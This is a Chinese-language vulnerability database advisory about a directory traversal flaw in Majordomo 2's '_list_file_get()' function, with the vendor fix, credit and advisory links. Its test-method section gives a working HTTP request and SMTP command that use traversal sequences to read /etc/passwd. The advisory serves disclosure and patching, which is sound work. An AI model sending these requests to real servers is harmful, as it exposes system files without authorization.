Majordomo 2 "_list_file_get()"目录遍历漏洞

漏洞起因
输入验证错误
危险等级
低

影响系统
Majordomo 2

不受影响系统

危害
远程攻击者可以利用漏洞以应用程序上下文获得系统敏感信息。

攻击所需条件
攻击者必须访问Majordomo。

漏洞信息
Majordomo是一款邮件列表应用程序。
当处理文件时"_list_file_get()"函数(lib/Majordomo.pm)存在一个输入验证错误，攻击者可以利用漏洞向应用程序接口提交特制请求通过目录遍历攻击获得任意文件信息。

测试方法
HTTP:
http://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&
extra=./…/./…/./…/./…/./…/./…/./…/./…/etc/passwd
SMTP:
help ./…/./…/./…/./…/./…/./…/./…/./…/etc/passwd

厂商解决方案
Majordomo snapshot 20110204及之后版本已经修复此漏洞：
http://www.mj2.org/

漏洞提供者
Nikolas Sotiriu.

漏洞消息链接
http://sotiriu.de/adv/NSOADV-2011-003.txt
http://secunia.com/advisories/43631/

← Microsoft Internet Explorer多个未明远程代码执行漏洞

Mail-Box Perl模块存在未明安全漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

Majordomo 2 "_list_file_get()"目录遍历漏洞

0 条评论。

发表评论